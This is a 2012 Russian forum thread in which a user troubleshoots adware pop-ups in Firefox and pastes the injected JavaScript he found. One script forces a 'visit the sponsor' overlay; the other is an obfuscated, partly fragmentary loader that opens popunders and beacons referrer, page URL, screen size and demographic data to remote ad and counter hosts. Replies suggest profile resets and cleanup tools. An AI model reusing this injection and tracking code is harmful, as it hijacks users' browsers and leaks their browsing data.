Вредоносное рекламное ПО с сайта LUXUP.RU

archie · №1

Здравствуйте, пару дней назад появилась проблема.
При открытии разных сайтов, где раньше никогда не было рекламы, выскакивает рекламное окно. Вчера целый день выскакивала реклама marketgid, сегодня поменялось на "БЕСПЛАТНОЕ ТЕСТИРОВАНИЕ ОТ (название открываемого сайта)". На этом сайте выскочило то же самое окно.
Рекламное окно на javascript.
В других браузерах тоже самое.
Ось - вин хр.
Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
Заранее спасибо за помощь.

Всем привет, немного разобрался в ситуации.

1. Дело не в браузере, в других браузерах вчера началось то же самое.
2. Проблема не в роутере и не в провайдере, на другом компе в локалке такого нет.

3. Начал копаться в html коде forum.mozilla-russia.org и кое-что нарыл:
В исходнике есть блок яндекс метрика, он загружает сценарий javascript по адресу mc.yandex.ru/resource/watch.js, который поверх окна сайта выводит рекламное окно и загружает другой сценарий по адресу http://c.luxup.ru/t/lb123811.js, который в свою очередь скачивает картинки и заполняет ими уже созданное окно.
Окно вылазит не постоянно, а с разной периодичностью: иногда по адресу mc.yandex.ru/resource/watch.js лежит пустой файл и выполняться просто нечему.

На другом компе, где этой проблемы нет, набираю mc.yandex.ru/resource/watch.js, а там лежит обычный скрипт яндекс метрики, который никаких рекламных окон не загружает.
Естесственно сразу кинулся проверять файл hosts на предмет перенаправлений, но там все нормально.

У кого какие мысли по этому поводу?

Watch.js

скрытый текст

function f_filterResults(n_win, n_docel, n_body) {
var n_result = n_win ? n_win : 0;
if (n_docel && (!n_result || (n_result > n_docel)))
n_result = n_docel;
return n_body && (!n_result || (n_result > n_body)) ? n_body : n_result;
}

function popMove()
{
popDiv = document.getElementById("popDiv");
if(popDiv != null)
{
popDiv.style.left = ((f_clientWidth() - 850)/ 2) + f_scrollLeft () + "px";
popDiv.style.top = ((f_clientHeight() - 550) / 2) + f_scrollTop () + "px";
}
}

function popHide()
{
popDiv = document.getElementById("popDiv");
clearInterval(popMoveRun);
popDiv.style.display = 'none';
return false;
}

function popShowClose()
{
popControl = document.getElementById("popControl");
popControl.style.display = 'block';
}

if(typeof(popMutex) == "undefined" && typeof(hrMutex) == "undefined")
{
var popMutex = true;

var popDiv = document.createElement("div");
popDiv.id = "popDiv";
popDiv.style.position = "absolute";
popDiv.style.width = "850px";
popDiv.style.height = "550px";
popDiv.style.backgroundColor = "white";
popDiv.style.zIndex = "1000";
popDiv.onclick = popShowClose;
document.body.appendChild(popDiv);

var advName = "DataMind";
var popInfo = document.createElement("div");
popInfo.id = "popInfo";
popInfo.style.position = "absolute";
popInfo.style.left = "10px";
popInfo.style.fontSize = "11px";
popInfo.style.fontWeight = "bold";
popInfo.style.padding = "0 1px 25px";
popInfo.style.height = "13px";
popInfo.style.color = "black";
popInfo.style.fontFamily = "Tahoma, Arial, sans-serif";
popInfo.style.display = "block";
popInfo.innerHTML = "Реклама системы " + advName + " <font color=\"red\">Посетите сайт спонсора чтобы продолжить просмотр сайта</font>";
popDiv.appendChild(popInfo);

var popControl = document.createElement("div");
popControl.id = "popControl";
popControl.style.position = "absolute";
popControl.style.right = "10px";
popControl.style.display = 'none';
popDiv.appendChild(popControl);

var popControlClose = document.createElement("a");
popControlClose.href = "#";
popControlClose.onclick = popHide;
popControlClose.style.fontSize = "11px";
popControlClose.style.fontWeight = "bold";
popControlClose.style.padding = "0 1px 25px";
popControlClose.style.color = "#096";
popControlClose.style.height = "13px";
popControlClose.style.fontFamily = "Tahoma, Arial, sans-serif";
popControlClose.style.display = "block";
popControlClose.innerHTML = "Закрыть";
popControl.appendChild(popControlClose);

var adDiv = document.createElement("div");
adDiv.id = "lx_381874";
adDiv.style.position = "absolute";
adDiv.style.top = "15px";
popDiv.appendChild(adDiv);

var adScript = document.createElement("script");
adScript.type = "text/javascript";
adScript.language="JavaScript";
adScript.charset = "utf-8";
adScript.src = "http://c.luxup.ru/t/lb123811.js?rt=" + (new Date).getTime() % 1E7 * 100 + Math.round(Math.random() * 99) + (document.referrer ? ("&r=" + escape(document.referrer)) : "");
document.body.appendChild(adScript);

var popMoveRun = setInterval (popMove, 10);
setTimeout(popShowClose, 10000);
}

lb123811.js

скрытый текст

[a-zA-Z]/.test(c)?e(c.replace(/^.*[a-zA-Z]+(.*)$/,"$1")):0}else if(g(f.ActiveXObject))try{var d=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if(d&&(c=d.GetVariable("$version")))c=c.split(" ")[1].split(","),a=[e(c[0]),e(c[1]),e(c[2])]}catch(m){}return a=a!==z?a.join("."):a}function Qa(){var a=ra(),b="10.0.42".split(".");if(a===z)return z;a=a.split(".");b[0]=parseInt(b[0],10);b[1]=parseInt(b[1],10)||0;b[2]=parseInt(b[2],10)||0;return a[0]>b[0]||a[0]==b[0]&&a[1]>b[1]||a[0]==b[0]&&
a[1]==b[1]&&a[2]>=b[2]?a.join("."):z}function D(a,b,c){a.addEventListener?a.addEventListener(b,c,z):a.attachEvent("on"+b,c)}function Ra(a,b){a.innerHTML=b;for(var c=[],d=a.childNodes,m=0;d[m];m++)c&&d[m].nodeName&&"script"===d[m].nodeName.toLocaleLowerCase()&&(!d[m].type||"text/javascript"===d[m].type.toLowerCase())&&c.push(d[m].parentNode?d[m].parentNode.removeChild(d[m]):d[m]);for(var e in c){var d=c[e],m=d.text||d.textContent||d.innerHTML||"",f=n.createElement("script");f.type="text/javascript";
f.appendChild(n.createTextNode(m));N.insertBefore(f,N.firstChild);N.removeChild(f);d.parentNode&&d.parentNode.removeChild(d)}}function aa(){var a="",a="?rt="+oa();n.referrer&&(a+="&r="+escape(n.referrer));P&&(a+="&recurring=1");ba&&(a+="&flash="+escape(ba));w&&(a+="&isie=1");if(!f[h].popunderShow)for(var b in i)if(i.hasOwnProperty(b)&&"object"==typeof i[b]&&g(i[b].type)&&"popunder"==i[b].type){a+="&pu=1";break}a+="&f="+h;g(screen.width)&&(a+="&scr="+escape(screen.width+"x"+screen.height));return a+=
f[h].multishowsAdd?"&"+f[h].multishowsAdd:""}function Sa(a){for(var b=a.length,c=[],d=0;d<b;d++)c.push(a[d].l+";"+a[d].n.join(";"));ca&&H(ca+"?"+c.join("&"),A())}function Ta(){I&&(clearTimeout(I),I=l);for(var a=E.length,b=[],c=0;c<a;c++)if(E[c]){var d;a:{var m=E[c];if(m){var e=getElementsByClass("lx__tsb",m);d=[];for(var g=[],k=void 0,i=e.length,k=0;k<i;k++){var h;if(h=e[k])b:{h=e[k];if(!(0===h.offsetWidth||0===h.offsetHeight))for(var q=C&&!f.opera?s.clientHeight:u.clientHeight,o=C&&!f.opera?s.clientWidth:
u.clientWidth,r=h.getClientRects(),v=0,w=r.length;v<w;v++){var p=r[v],t=0<=p.left&&p.left+(p.width?p.width:p.right-p.left)<o,x;if(x=0<=p.top&&p.top+(p.height?p.height:p.bottom-p.top)<q){if(t){p=n.elementFromPoint((p.left+p.right)/2,(p.top+p.bottom)/2);if(p===h)p=j;else c:{if(p)for(p=p.parentNode;p!=l

{if(p==h){p=j;break c}p=p.parentNode}p=z}t=p}x=t}if(x){h=j;break b}}h=z}h&&(d.push(e[k].getAttribute("tsbid")),g.push(e[k]))}e=g.length;for(k=0;k<e;k++)h=g[k],h.className=h.className.replace(RegExp("(^|\\s)lx__tsb(\\s|$)",
"g"),"$1").replace(/\s+/g," ").replace(/(^ | $)/g,"");if(g=d.length){m=getElementsByClass("lx__tsbc",m);m=m[0];m=m.getAttribute("tsbc");d={n:d,all:i==g,l:m};break a}}d=z}if(d!==z){d.all&&delete E[c];i=d.n;m=[];g=0;k=i.length;a:for(;g<k;g++){e=0;for(h=m.length;e<h;e++)if(m[e]==i[g])continue a;m[m.length]=i[g]}b.push({n:m,l:d.l})}}b.length&&Sa(b)}function da(){I&&clearTimeout(I);I=setTimeout(Ta,1E3)}function sa(){t.demogr&&t.interests&&!t.sent&&H("http://"+S+"/set_li_stat/?sex="+t.sex+"&lage="+t.lage+
"&uage="+t.uage+"&interest="+t.interest,function(){t.sent=j})}function x(a,b){o.style[a]=b}function Ua(){f[b].bottomReady=function(a){a=e(a);o.childNodes[1].height=a+q;x("height",a+5+q)}}function ea(a){var b=a.toString(),b=b.substr(9),b=b.substr(0,b.indexOf("("));g(J[b])?(clearTimeout(J[b]),J[b]=setTimeout(function(){clearInterval(J[b]);a();delete J.C},ta))

J[b]=setInterval(function(){a()},ta),a())}function ua(){ea(va)}function wa(){ea(T);w&&(ea(xa),setTimeout(T,250))}function xa(){x("width",s.clientWidth?
s.clientWidth:u.clientWidth)}function va(){fa(K,{bottom:j,right:j})}function T(){fa(o,{bottom:j})}function fa(a,b){var c=a.style;if(g(b[v])&&b[v]&&!g(a.d))a.d=e(a.currentStyle[v]),g(b[v])&&b[v]&&(c[v]=U);if(g(b.right)&&b.right&&!g(a.q)&&(a.q=e(a.currentStyle.right),g(b.right)&&b.right))c.right="";if(g(b.left)&&b.left&&!g(a.u))a.u=e(a.currentStyle.left);if(g(b[v])&&b[v])c.position=L,c.top=w?0-a.d-(e(c.height)?e(c.height):a.offsetHeight)+(s.clientHeight?s.clientHeight:u.clientHeight)+e(C&&!f.opera?
s.scrollTop:u.scrollTop)+q:0-a.d-e(c.height)+e(f.innerHeight)+e(f.pageYOffset)+q;if(g(b.right)&&b.right)c.position=L,C?c.right=a.q-(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q:c.left=0-a.q-(e(c.width)?e(c.width):a.offsetWidth)+(s.clientWidth?s.clientWidth:u.clientWidth)+(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q;if(g(b.left)&&b.left)c.position=L,c.left=a.u+e(C&&!f.opera?s.scrollLeft:u.scrollLeft)+q}function ya(){var a=n.getElementsByTagName("object"),b=n.getElementsByTagName("embed"),c={m:z,w:[],embeds:[]};
if(V)for(var d=0;d<a.length;d++){for(var e=z,f=a[d].getElementsByTagName("param"),h=0;h<f.length;h++)if("wmode"==f[h].getAttribute("name").toLowerCase()){e=j;break}if(e)c.m=j,c.w.push(a[d])}for(d=0;d<b.length;d++){a=b[d].getAttribute("wmode");if(!(e=!a))g(a)?(a=a.toLowerCase(),a="transparent"!=a&&"opaque"!=a?z:j):a=z,e=!a;if(e)c.m=j,c.embeds.push(b[d])}return c}function Va(){for(var a=ya(),b=a.w,a=a.embeds,c=0;c<b.length;c++){var d=n.createElement("param");d.setAttribute("name","wmode");d.setAttribute("value",
"transparent");b[c].appendChild(d);b[c].outerHTML=b[c].outerHTML}for(c=0;c<a.length;c++)a[c].setAttribute("wmode","transparent"),a[c].outerHTML=a[c].outerHTML}function Q(a){var b=a.which?a.which:a.button,a

w?a.srcElement:a.target).nodeName.toLowerCase();if(("a"==a||"img"==a)&&2!=b&&3!=b)clearTimeout(ga),ga=setTimeout(function(){ga=l;za()},500)}function Wa(){var a="";if(F)for(var b in i)i.hasOwnProperty(b)&&"object"==typeof i[b]&&(a+=escape(b.substr(1))+";");0<a.length&&(a=a.substring(0,a.length-
1));return a}function Aa(a){Ba(a.target?a.target:a.srcElement)}function Xa(a){var b

\/i\/(a??)(\d+?)\//m,c=b.exec(a),d=z;if(c!=l&&16!=c){d=e(c[2]);d

2*(10*d+40)-40)/10;16<=d&&(d=16);var f=10*d+40,d=a.replace(b,"/i/$1"+d+"/")}return{url:d,size:f}}function Ca(a){var b=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollTop:u.scrollTop),c=e(b+(C&&!f.opera?s.clientHeight:u.clientHeight)),d=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollLeft:u.scrollLeft),g=e(d+(C&&!f.opera?s.clientWidth:u.clientWidth)),
h=a.getClientRects()[0],i=Math.round(h.top)+b,k=Math.round(h.bottom)+b,o=Math.round(h.left)+d,h=Math.round(h.right)+d;if(i<b)a.style.top=e(a.style.top)+(b-i)+W+q;if(k>c)a.style.top=e(a.style.top)-(k-c)-W+q;if(o<d)a.style.left=e(a.style.left)+(d-o)+W+q;if(h>g)a.style.left=e(a.style.left)-(h-g)-W+q}function ha(a,b){clearTimeout(a.getAttribute("enlargeTimer"));var c

a(b),d=e(a.height)-y;a.width=e(a.width)-y;a.height=d;d=e(c.left)>e(a.style.left)?e(a.style.left)+y/2:e(a.style.left)-y/2;a.style.top=(e(c.top)>
e(a.style.top)?e(a.style.top)+y/2:e(a.style.top)-y/2)+q;a.style.left=d+q;e(a.width)>e(b.width)?a.setAttribute("shrinkTimer",setTimeout(function(){ha(a,b)},R))

a.style.top="-100000px",a.style.left="-100000px",b.style.visibility="",b.parentNode.style.zIndex="")}function Ea(a,b){clearTimeout(a.getAttribute("shrinkTimer"));var c=e(a.height)+y;a.width=e(a.width)+y;a.height=c;c=e(a.style.left)-y/2;a.style.top=e(a.style.top)-y/2+q;a.style.left=c+q;Ca(a);e(a.width)<b&&a.setAttribute("enlargeTimer",setTimeout(function(){Ea(a,
b)},R))}function Da(a){for(var b=0,c=0;a&&"relative"!

a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position&&"absolute"!

a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position;)b+=e(a.offsetTop),c+=e(a.offsetLeft),a=a.offsetParent;return{top:b,left:c}}function Ba(a){var b,c

a(a),d=Xa(a.src),e=d.size;if((d=d.url)||d!=a.src){a.previousSibling&&"img"==a.previousSibling.nodeName.toLowerCase()?b=a.previousSibling:(b=a.cloneNode(z),w&&b.detachEvent("onmouseover",Aa),b.style.position=L,b.style.top=
"-100000px",b.style.left="-100000px",b.style.margin="0px",n.addEventListener?b.addEventListener("mouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))},z):b.attachEvent("onmouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))}),a.parentNode.insertBefore(b,a));if(b.src==a.src){var f=b.cloneNode(z);D(f,"load",function(){b.src=f.src;setTimeout(function(){f.parentNode.removeChild(f)},
100)});f.src=d;b.parentNode.insertBefore(f,b)}b.width=a.width;b.height=a.height;b.style.top=c.top+q;b.style.left=c.left+q;a.style.visibility="hidden";a.parentNode.style.zIndex=1E5;Ca(b);b.setAttribute("enlargeTimer",setTimeout(function(){Ea(b,e)},R))}}function Ya(a,b){b&&(D(n,ia,Fa(a)),X&&(Y(a)(),D(f,"resize",Ga(a)),D(f,ia,Ga(a))));for(var c=getElementsByClass("close",a.a),d=c.length,e=0;e<d;e++)D(c[e],ja,Za(a));c=getElementsByClass("ref",a.a);d=c.length;for(e=0;e<d;e++)D(c[e],ja,Ha(a))}function Za(a){return function(b){if(b||
f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;a.s=j;ka(a);b=new Date;b.setTime(b.getTime()+36E5*$a);n.cookie="_lxretpopupignore=1; path=/; expires="+b.toUTCString()}}function Ha(a){return function(b){if(b||f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;clearTimeout(a.i);a.j=j;ka(a,function(){H(la+a.B+"/"+aa(),A())})}}function Fa(a){return function(){if(!a.s&&!a.j){var b=e(s.scrollTop?s.scrollTop:u.scrollTop);!a.k&&b>=a.v?ab(a):a.k&&b<a.v&&
ka(a)}}}function Y(a){return function(){a.a[a.b+"Offset"]=e(a.a.style[a.b]);var b={bottom:j};a.b==Ia&&(b[Ia]=j);a.b==Ja&&(b[Ja]=j);fa(a.a,b)}}function Ga(a){return function(){g(a.t)&&clearTimeout(a.t);a.t=setTimeout(Y(a),100)}}function Ka(a){var b=0;return b=X?a.a[a.b+"Offset"]:e(a.a.style[a.b])}function ab(a){a.k=j;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.i=setTimeout(Ha(a),1E3*a.refresh);a.a.style.display="block";a.c=setInterval(function(){var b=Ka(a),c=b+La;0>b&&0>c?(a.h=j,a.a.style[a.b]=
c+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=0+q);X&&Y(a)()},Ma)}function ka(a,b){a.k=z;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.c=setInterval(function(){var c=Ka(a),d=c-La;c>=-a.width&&d>-a.width?(a.h=j,a.a.style[a.b]=d+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=-a.width+q,a.a.style.display="none",g(b)&&b());X&&Y(a)()},Ma)}function za(a){if(!Z){Z=j;var b=Wa();b&&(a?(n.write('<scr'+'ipt type="'+qa+'" language="JavaScr'+'ipt" src="'+la+b+"/"+aa()+'"><\/scr'+'ipt>'),Z=z):H(la+b+"/"+aa(),function(){Z=
z}))}}var i={"_336612":{id:"lx_336612"},"_381874":{id:"lx_381874",A:!0}},h="__lxG123811__",B="__lxG__",G={},n=document,f=window,u=n.body,s=n.documentElement,N=function(){var a=n.getElementsByTagName("head")[0];if(a)return a;for(a=s.firstChild;a&&"#text"==a.nodeName.toLowerCase()

a=a.nextSibling;if(a&&"#text"!=a.nodeName.toLowerCase())return a;a=n.createElement("head");
s.appendChild(a);return a}(),$=navigator.userAgent.toLowerCase(),w=/msie/.test($)&&!/opera/.test($),bb=(navigator.userAgent.toLowerCase().match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[])[1],C="CSS1Compat"===n.compatMode,ma=/chrome/.test($),V=/opera/.test($),P=z,Z=z,ga=l,F=0,E=[],I=l,ba=ma?Qa():ra(),Na=z,K=l,o=l,ta=50,na=l,Oa=z,v="bottom",q="px",L="absolute",r={},qa="text/javascript",pa="type",U="auto",M="",Pa=z,ca="",W=3,y=10,R=10,Ja="right",Ia="left",ia="scroll",ja="click",$a=480,Ma=15,La=22,X=w&&(!C||
8>e(bb)&&C),S="luxup.ru",la="http://"+S+"/multishows/",J={},t={demogr:z,interests:z,sent:z};getElementsByClass=n.getElementsByClassName?function(a,b){return(b||document).getElementsByClassName(a)}:function(a,b){var c

b||document).getElementsByTagName("*"),d=c.length,e=a.split(/\s+/),f=e.length,h=[],g,i;for(g=0;g<d;g++)for(i=0;i<f;i++)if(-1!=c[g].className.search("\\b"+e[i]+"\\b")){h.push(c[g]);break}return h};D(f,ia,da);G[h]={};G[h].g=function(){if(!M)return j;M+="?rnd="+oa()+(f[h].popunderAdd?"&"+
f[h].popunderAdd:"");var a=window;window.open(M,h+"popunder","toolbar=1,location=1,status=1, menubar=1,scrollbars=1,resizable=1");M="";a.focus();u.detachEvent?(u.detachEvent("onclick",G[h].g),u.releaseCapture())

u.removeEventListener("click",G[h].g,j),u.removeEventListener("click",G[h].g));return j};g(f[h])||(f[h]={});g(f[b])||(f[b]={});f[h].closed=A();f[h].clicked=A();if(!g(f[h].popunderShow))f[h].popunderShow=z;if(!g(f[h].allLoaded))f[h].allLoaded=A();if(!g(f[h].popunderAdd))f[h].popunderAdd="";
if(!g(f[h].multishowsAdd))f[h].multishowsAdd="";f[b].demogr=function(a){t.sex=encodeURIComponent(a.gen);t.lage=encodeURIComponent(a.lage);t.uage=encodeURIComponent(a.uage);t.demogr=j;sa()};f[b].interests=function(a){t.interest=encodeURIComponent(a.hier_inter.join(","));t.interests=j;sa()};f[h].parser=function(a){E=[];for(var b in a)if(a.hasOwnProperty(b)){var c=a[b];if("cfg"==c.type)c.hasOwnProperty("realShowsUrl")&&(ca=c.realShowsUrl),c.hasOwnProperty("getLiData")&&setTimeout(function(){H("http://medianet.yadro.ru/hier_inter.txt",
A());H("http://medianet.yadro.ru/info.txt",A())},0);else if("counters"==c.type){if(c.hasOwnProperty("urls"))for(var d=0;d<c.urls.length;d++)(new Image).src=c.urls[d]}else if(g(i["_"+c.id])&&g(c.source)&&c.source){if((d=n.getElementById(i["_"+c.id].id))&&"html"==c.type)if(P||(O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),d.innerHTML=c.source,i["_"+c.id].f=j,getElementsByClass("lx__tsbc",d).length&&E.push(d),g(i["_"+c.id].A)&&i["_"+c.id].A)for(var m=d.getElementsByTagName("img"),
s=m.length,t=0;t<s;t++)n.addEventListener?m[t].addEventListener("mouseover",function(){Ba(this)},z):m[t].attachEvent("onmouseover",Aa);if(d&&"pu"==c.type&&!Pa)M="http://c."+S+"/pu/"+c.id+".html",n.addEventListener?u.addEventListener("click",G[h].g,j)

u.attachEvent("onclick",G[h].g),u.setCapture(j)),Pa=i["_"+c.id].f=j;if(d&&"js"==c.type)P||(g(c.style)&&O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),Ra(d,c.source),i["_"+c.id].f=j;if(d&&"flash"==c.type&&!Na)K=
d,O(c.style),f[h].closed=function(){K.parentNode.removeChild(K)},f[h].clicked=function(){K.parentNode.removeChild(K)},d.innerHTML=c.source,i["_"+c.id].f=j,w&&(f.attachEvent("onscroll",ua),f.attachEvent("onresize",ua),va()),Na=j,getElementsByClass("lx__tsbc",d).length&&E.push(d);if(d&&c.type==v)o=d,(V||ma)&&Oa&&g(i["_"+c.id].z)&&i["_"+c.id].z&&Va(),""!=c.style&&O(c.style),w?o.e=e(o.currentStyle[v])

o.e=e(n.defaultView.getComputedStyle(o,l).bottom),V&&(o.e-=1)),f[b].bottomClosed=function(){var a=n.createElement("a");
a.innerHTML=".";a.href="medianet.adlabs.ru";o.appendChild(a);a.focus();a.blur();o.style.display="none";da()},x("position",L),x(v,U),x("top","-100000px"),x("zIndex",99999),f[b].bottomReady=function(a,b){a=e(a);if(150<a)return z;o.childNodes[1].height=a+q;x(v,"-"+(a+5+10)+q);x("top","");w?x("position",L):x("position","fixed");if(w){if(0!=b)xa(),clearInterval(na),f[b].bottomReady=A()}else f[b].bottomReady=A();na=setInterval(function(){var a=w&&g(o.d)?o.d:e(o.style[v]);if(a<o.e&&!(6.25>o.e-a)){if(x(v,
a+5+q),w)o.d=a+5,x(v,U),T()}else{clearInterval(na);x(v,o.e+q);if(w)o.d

.e,x(v,U),T(),f.attachEvent("onscroll",wa),f.attachEvent("onresize",wa);setTimeout(Ua,100)}},25)},o.innerHTML=c.source,ba||setTimeout(function(){var a=0,a=w?o.offsetHeight:n.defaultView.getComputedStyle(o,l).height;f[b].bottomReady(e(a)-5,1)},250),i["_"+c.id].f=j;if(d&&"float"==c.type){m=z;P||(O(c.style),D(d,ja,Q));if(!g(r[k])){var k=c.id;r[k]=i["_"+k];r[k].B=k;r[k].a=d;r[k].k=z;r[k].s=z;r[k].h=z;r[k].i=0;r[k].j=z;m=j}r[k].a.innerHTML=
c.source;r[k].a.style[r[k].b]=-1E3+q;r[k].a.style.display="block";r[k].width=e(r[k].a.width?r[k].a.width:r[k].a.offsetWidth);r[k].a.style[r[k].b]=-r[k].width+q;Ya(r[k],m);if(r[k].j)r[k].j=z;Fa(r[k])();i["_"+c.id].f=j;getElementsByClass("retail__tsbc",d).length&&E.push(d)}}}for(var y in i)i.hasOwnProperty(y)&&!g(i[y].f)&&g(i[y].r)&&i[y].r();P=z;setTimeout(function(){f[h].allLoaded()},0);da()};(function(){for(var a in i)if(i.hasOwnProperty(a)&&"object"==typeof i[a]){var b=n.getElementById(i[a].id),
c=z;g(i[a].type)&&"float"==i[a].type&&-1!=n.cookie.indexOf("_lxretpopupignore=1")&&(c=j);if(!b||c)delete i[a];else if((V||ma)&&g(i[a].type)&&"bottom"==i[a].type)if(ya().m){if(Oa=j,!g(i[a].o)||g(i[a].o)&&!i[a].o)F+=1}else F+=1;else F+=1}})();(new Image).src="http://counter.yadro.ru/hit;Luxup?r"+escape(n.referrer)+("undefined"==typeof screen?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(n.URL)+";"+Math.random();(new Image).src="http://"+S+"/merge_gpsid/?t="+(new Date).getTime();za(0)})();

Отредактировано archie (20-12-2012 10:27:31)

feas · №2

archie пишет

Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.

обновитесь + новый профиль

Добавлено 18-12-2012 18:07:38
Починка браузера. Перенос своих настроек на новый профиль.

Отредактировано feas (18-12-2012 18:07:38)

archie · №3

feas пишет

archie пишет
Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
обновитесь + новый профиль
Добавлено 18-12-2012 18:07:38
Починка браузера. Перенос своих настроек на новый профиль.

Ну, я в принципе догадался, что зараза скорее всего где-то в файлах настройки. Просто никогда раньше такого не встречал, холельсь бы разобраться что это и где оно сидит.

Добавлено 18-12-2012 18:20:14
Кстати, забыл - примерно в это же время в %USERDIR%\aplication data появился какой-то эгзэшник что-то типа "20lg16p1s.exe", который пытался связаться с сайтом по-моему lcogum dot net (его каспер нашел). я его удалил, потом просканировал папку пользователя - каспер ничего не нашел.

Отредактировано archie (18-12-2012 18:20:14)

feas · №4

archie пишет

"20lg16p1s.exe", который пытался связаться с сайтом по-моему lcogum dot net (его каспер нашел). я его удалил

молодец.
подобные exe ещё стоит поискать в автозагрузке (msconfig в строке выполнить - соотв. вкладка)
Что делать, если есть подозрение на заражение системы вирусами?
Ну и я доверяю этим парням, антивирусам http://skt.admyn.ru/more.php?tid=10

archie · №5

feas пишет

подобные exe ещё стоит поискать в автозагрузке (msconfig в строке выполнить - соотв. вкладка)

Ну он собственно в автозагрузке и стоял, после удаления загружать больше нечего
Вопрос есть ли связь между ним и лисом, в других браузерах же все норм. Уже перерыл всю папку профиля лиса. По идее нужно искать какой-нибудь .js файл?

feas · №6

archie пишет

По идее нужно искать какой-нибудь .js файл?

зачем? лучше проверьте осталась ли проблема? вирус просто воспользовался тем что в [firefox] 3.6 больше необновляется ваша же безопасность. Аналогично и в [windows] ХР. Каспер видно тоже подвел.

Отредактировано feas (18-12-2012 18:53:35)

archie · №7

feas пишет

зачем? лучше проверьте осталась ли проблема? вирус просто воспользовался тем что в 3.6 больше необновляется ваша же безопасность. Аналогично и в ХР. Каспер видно тоже подвел.

Проблема никуда не пропадала, тот эгзэшник я удалил еще позавчера, когда проблема только появилась, насчет заражения системы говорить преждевременно. повторяю проблема лишь в firefox, в остальных браузерах ее нет. Скорее всего где-то запускается какой-то сценарий javascript при работе в лисе

Добавлено 18-12-2012 19:06:04
Еще раз повторю, проблему локализировал на сколько смог :
1. Проявляется только в firefox.
2. При отключении javascript проблема исчезает.

Может кто-нибудь с этим сталкивался?

Отредактировано archie (18-12-2012 19:06:04)

feas · №8

папка chrome в ней userChrome.js - только так.
Папки профиля
тут список всех рабочих файлов - лишние как правило либо часть расширения либо то что ты ищешь.

gjurza · №9

Такая же проблема... уже замучился... ни один антивирусник не ищет...

выскакивает тот баннер что написал ТС и еще "Бесплатное тестирование от сайта хххх"

кстати в опере тоже выскакивает...

Отредактировано gjurza (19-12-2012 23:08:51)

foka · №10

_http://www.toolbarcleaner.com/ позволяет удалить левое ПО, дополнения, но самостоятельно и осторожно. И Malwarebytes Anti-Malware удаляет автоматически всякие бяки.

gjurza · №11

gjurza пишет

Такая же проблема... уже замучился... ни один антивирусник не ищет...
выскакивает тот баннер что написал ТС и еще "Бесплатное тестирование от сайта хххх"
кстати в опере тоже выскакивает...

не находит.... все напрасно

Отредактировано gjurza (20-12-2012 01:49:49)

archie · №12